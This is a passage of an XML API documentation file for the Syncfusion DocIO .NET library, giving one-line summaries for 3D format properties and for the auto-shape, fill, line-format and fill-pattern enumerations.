        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.HasBevelTop">
            <summary>
            To Convey the shape has bevel top
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.HasContourColor">
            <summary>
            To Convey the shape has contour color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.HasExtrusionColor">
            <summary>
            To Convey the shape has extrusion color
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.PropertiesHash">
            <summary>
            ThreeD Effects properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ThreeDFormat.DocxProps">
            <summary>
            ThreeD effects extensions.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.AutoShapeType">
            <summary>
            Specifies the types of auto shapes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Rectangle">
            <summary>
            Rectangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RoundedRectangle">
            <summary>
            Rounded rectangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.SnipSingleCornerRectangle">
            <summary>
            Snip single corner rectangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.SnipSameSideCornerRectangle">
            <summary>
            Snip same side corner rectangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.SnipDiagonalCornerRectangle">
            <summary>
            Snip diagonal corner rectangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.SnipAndRoundSingleCornerRectangle">
            <summary>
            Snip and round single corner rectangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RoundSingleCornerRectangle">
            <summary>
            Round single corner rectangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RoundSameSideCornerRectangle">
            <summary>
            Round same side corner rectangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RoundDiagonalCornerRectangle">
            <summary>
            Round diagonal corner rectangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Oval">
            <summary>
            Oval.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.IsoscelesTriangle">
            <summary>
            Isosceles triangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RightTriangle">
            <summary>
            Right triangle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Parallelogram">
            <summary>
            Parallelogram.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Trapezoid">
            <summary>
            Trapezoid.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Diamond">
            <summary>
            Diamond.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RegularPentagon">
            <summary>
            Regular pentagon.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Hexagon">
            <summary>
            Hexagon.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Heptagon">
            <summary>
            Heptagon.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Octagon">
            <summary>
            Octagon.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Decagon">
            <summary>
            Decagon.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Dodecagon">
            <summary>
            Dodecagon.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Pie">
            <summary>
            Pie.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Chord">
            <summary>
            Chord.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Teardrop">
            <summary>
            Teardrop.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Frame">
            <summary>
            Frame.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.HalfFrame">
            <summary>
            Half frame.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.L_Shape">
            <summary>
            L_Shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.DiagonalStripe">
            <summary>
            Diagonal stripe.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Cross">
            <summary>
            Cross.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Plaque">
            <summary>
            Plaque.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Can">
            <summary>
            Can.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Cube">
            <summary>
            Cube.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Bevel">
            <summary>
            Bevel.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Donut">
            <summary>
            Donut.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.NoSymbol">
            <summary>
            "No" symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.BlockArc">
            <summary>
            Block arc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FoldedCorner">
            <summary>
            Folded corner.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.SmileyFace">
            <summary>
            Smiley face.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Heart">
            <summary>
            Heart.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LightningBolt">
            <summary>
            Lightning bolt.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Sun">
            <summary>
            Sun.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Moon">
            <summary>
            Moon.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Cloud">
            <summary>
            Cloud.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Arc">
            <summary>
            Arc.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.DoubleBracket">
            <summary>
            Double bracket.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.DoubleBrace">
            <summary>
            Double brace.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LeftBracket">
            <summary>
            Left bracket.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RightBracket">
            <summary>
            Right bracket.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LeftBrace">
            <summary>
            Left brace.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RightBrace">
            <summary>
            Right brace.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RightArrow">
            <summary>
            Block arrow that points right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LeftArrow">
            <summary>
            Block arrow that points left.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.UpArrow">
            <summary>
            Block arrow that points up.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.DownArrow">
            <summary>
            Block arrow that points down.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LeftRightArrow">
            <summary>
            Block arrow with arrowheads that point both left and right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.UpDownArrow">
            <summary>
            Block arrow that points up and down.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.QuadArrow">
            <summary>
            Block arrows that point up, down, left, and right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LeftRightUpArrow">
            <summary>
            Block arrow with arrowheads that point left, right, and up.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.BentArrow">
            <summary>
            Block arrow that follows a curved 90-degree angle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.UTurnArrow">
            <summary>
            Block arrow forming a U shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LeftUpArrow">
            <summary>
            Block arrow with arrowheads that point left and up.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.BentUpArrow">
            <summary>
            Block arrow that follows a sharp 90-degree angle. Points up by default.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CurvedRightArrow">
            <summary>
            Block arrow that curves right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CurvedLeftArrow">
            <summary>
            Block arrow that curves left.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CurvedUpArrow">
            <summary>
            Block arrow that curves up.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CurvedDownArrow">
            <summary>
            Block arrow that curves down.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.StripedRightArrow">
            <summary>
            Block arrow that points right with stripes at the tail.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.NotchedRightArrow">
            <summary>
            Notched block arrow that points right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Pentagon">
            <summary>
            Pentagon.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Chevron">
            <summary>
            Chevron
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RightArrowCallout">
            <summary>
            Callout with arrow that points right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.DownArrowCallout">
            <summary>
            Callout with arrow that points down.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LeftArrowCallout">
            <summary>
            Callout with arrow that points left.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.UpArrowCallout">
            <summary>
            Callout with arrow that points up.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LeftRightArrowCallout">
            <summary>
            Callout with arrowheads that point both left and right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.UpDownArrowCallout">
            <summary>
            Callout with arrows that point up and down.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.QuadArrowCallout">
            <summary>
            Callout with arrows that point up, down, left, and right.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CircularArrow">
            <summary>
            Block arrow that follows a curved 180-degree angle.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.MathPlus">
            <summary>
            Math plus(+).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.MathMinus">
            <summary>
            Math minus(-).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.MathMultiply">
            <summary>
            Math multiply(x).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.MathDivision">
            <summary>
            Math division.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.MathEqual">
            <summary>
            Math equal(=).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.MathNotEqual">
            <summary>
            Math not equal.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartProcess">
            <summary>
            Process flowchart symbol..
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartAlternateProcess">
            <summary>
            Alternate process flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartDecision">
            <summary>
            Decision flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartData">
            <summary>
            Data flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartPredefinedProcess">
            <summary>
            Predefined process flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartInternalStorage">
            <summary>
            Internal storage flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartDocument">
            <summary>
            Document flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartMultiDocument">
            <summary>
            Multi-document flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartTerminator">
            <summary>
            Terminator flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartPreparation">
            <summary>
            Preparation flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartManualInput">
            <summary>
            Manual input flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartManualOperation">
            <summary>
            Manual operation flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartConnector">
            <summary>
            Connector flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartOffPageConnector">
            <summary>
            Off-page connector flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartCard">
            <summary>
            Card flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartPunchedTape">
            <summary>
            Punched tape flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartSummingJunction">
            <summary>
            Summing junction flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartOr">
            <summary>
            "Or" flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartCollate">
            <summary>
            Collate flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartSort">
            <summary>
            Sort flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartExtract">
            <summary>
            Extract flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartMerge">
            <summary>
            Merge flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartStoredData">
            <summary>
            Stored data flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartDelay">
            <summary>
            Delay flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartSequentialAccessStorage">
            <summary>
            Sequential access storage flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartMagneticDisk">
            <summary>
            Magnetic disk flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartDirectAccessStorage">
            <summary>
            Direct access storage flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.FlowChartDisplay">
            <summary>
            Display flowchart symbol.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Explosion1">
            <summary>
            Explosion.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Explosion2">
            <summary>
            Explosion.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Star4Point">
            <summary>
            4-point star.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Star5Point">
            <summary>
            5-point star.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Star6Point">
            <summary>
            6-point star.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Star7Point">
            <summary>
            7-point star.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Star8Point">
            <summary>
            8-point star.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Star10Point">
            <summary>
            10-point star.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Star12Point">
            <summary>
            12-point star.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Star16Point">
            <summary>
            16-point star.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Star24Point">
            <summary>
            24-point star.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Star32Point">
            <summary>
            32-point star.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.UpRibbon">
            <summary>
            Ribbon banner with center area above ribbon ends.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.DownRibbon">
            <summary>
            Ribbon banner with center area below ribbon ends.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CurvedUpRibbon">
            <summary>
            Ribbon banner that curves up.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CurvedDownRibbon">
            <summary>
            Ribbon banner that curves down.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.VerticalScroll">
            <summary>
            Vertical scroll.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.HorizontalScroll">
            <summary>
            Horizontal scroll.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Wave">
            <summary>
            Wave.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.DoubleWave">
            <summary>
            Double wave.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RectangularCallout">
            <summary>
            Rectangular callout.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.RoundedRectangularCallout">
            <summary>
            Rounded rectangle-shaped callout.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.OvalCallout">
            <summary>
            Oval-shaped callout.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CloudCallout">
            <summary>
            Cloud callout.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout1">
            <summary>
            Callout with border and horizontal callout line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout2">
            <summary>
            Callout with diagonal straight line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout3">
            <summary>
            Callout with angled line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout1AccentBar">
            <summary>
            Callout with horizontal accent bar.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout2AccentBar">
            <summary>
            Callout with diagonal callout line and accent bar.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout3AccentBar">
            <summary>
            Callout with angled callout line and accent bar.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout1NoBorder">
            <summary>
            Callout with horizontal line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout2NoBorder">
            <summary>
            Callout with no border and diagonal callout line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout3NoBorder">
            <summary>
            Callout with no border and angled callout line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout1BorderAndAccentBar">
            <summary>
            Callout with border and horizontal accent bar.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout2BorderAndAccentBar">
            <summary>
            Callout with border, diagonal straight line, and accent bar.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.LineCallout3BorderAndAccentBar">
            <summary>
            Callout with border, angled callout line, and accent bar.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.Line">
            <summary>
            Line.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.ElbowConnector">
            <summary>
            Elbow connector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CurvedConnector">
            <summary>
            Curved connector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.StraightConnector">
            <summary>
            Straight line connector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.BentConnector2">
            <summary>
            Bent connector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.BentConnector4">
            <summary>
            Bent connector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.BentConnector5">
            <summary>
            Curved connector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CurvedConnector2">
            <summary>
            Curved connector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CurvedConnector4">
            <summary>
            Curved connector.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.AutoShapeType.CurvedConnector5">
            <summary>
            Curved connector.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FillType">
            <summary>
            Specifies the fill type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FillType.FillBackground">
            <summary>
            Fill is the same as the background.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FillType.FillGradient">
            <summary>
            Gradient fill.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FillType.FillMixed">
            <summary>
            Mixed fill.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FillType.FillPatterned">
            <summary>
            Patterned fill.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FillType.FillPicture">
            <summary>
            Picture fill.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FillType.FillSolid">
            <summary>
            Solid fill.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FillType.FillTextured">
            <summary>
            Textured fill.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BlipTransparency">
            <summary>
            Specifies the blip transparency
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.LineFormatType">
            <summary>
            Specifies the type of line formats.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LineFormatType.Gradient">
            <summary>
            Gradient format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LineFormatType.None">
            <summary>
            None format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LineFormatType.Patterned">
            <summary>
            patterned format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.LineFormatType.Solid">
            <summary>
            Solid format.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PatternType">
            <summary>
            Specifies the fill pattern type used.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern10Percent">
            <summary>
            10% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern20Percent">
            <summary>
            20% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern25Percent">
            <summary>
            25% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern30Percent">
            <summary>
            30% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern40Percent">
            <summary>
            40% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern50Percent">
            <summary>
            50% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern5Percent">
            <summary>
            5% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern60Percent">
            <summary>
            60% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern70Percent">
            <summary>
            70% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern75Percent">
            <summary>
            75% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern80Percent">
            <summary>
            80% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Pattern90Percent">
            <summary>
            90% of the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Cross">
            <summary>
            Cross.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DarkDownwardDiagonal">
            <summary>
            Thick lines in the foreground color running from the top to the right-hand side of the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DarkHorizontal">
            <summary>
            Thick horizontal lines in the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DarkUpwardDiagonal">
            <summary>
            Thick lines in the foreground color running from the top to the left-hand side of the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DarkVertical">
            <summary>
            Thick vertical lines in the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DashedDownwardDiagonal">
            <summary>
            Dashed lines in the foreground color running from the top to the right-hand side of the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DashedHorizontal">
            <summary>
            Dashed horizontal lines in the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DashedUpwardDiagonal">
            <summary>
            Dashed lines in the foreground color running from the top to the left-hand side of the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DashedVertical">
            <summary>
            Dashed vertical lines in the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DiagonalBrick">
            <summary>
            Rectangular brick pattern running diagonally across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DiagonalCross">
            <summary>
            Diagonal Cross
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Divot">
            <summary>
            Small angled shapes in the foreground color running in alternating rows down the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DottedDiamond">
            <summary>
            Dotted perpendicular lines in the foreground color running diagonally to form diamonds across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DottedGrid">
            <summary>
            Dotted perpendicular lines in the foreground color running horizontally and vertically to form grid lines across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.DownwardDiagonal">
            <summary>
            Downward Diagonal
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Horizontal">
            <summary>
            Horizontal
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.HorizontalBrick">
            <summary>
            Rectangular brick pattern running horizontally across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.LargeCheckerBoard">
            <summary>
            Squares in alternating foreground/background colors.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.LargeConfetti">
            <summary>
            Large dots in the foreground color scattered across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.LargeGrid">
            <summary>
            Solid, widely spaced perpendicular lines in the foreground color running horizontally and vertically to form grid lines across the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.LightDownwardDiagonal">
            <summary>
            Thin lines in the foreground color running from the top to the right-hand side of the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.LightHorizontal">
            <summary>
            Thin horizontal lines in the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.LightUpwardDiagonal">
            <summary>
            Thin lines in the foreground color running from the top to the left-hand side of the shape.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.LightVertical">
            <summary>
            Thin vertical lines in the foreground color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.Mixed">
            <summary>
            Not supported.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PatternType.NarrowHorizontal">
            <summary>
            Narrowly spaced horizontal lines in the foreground color.
            </summary>
        </member>
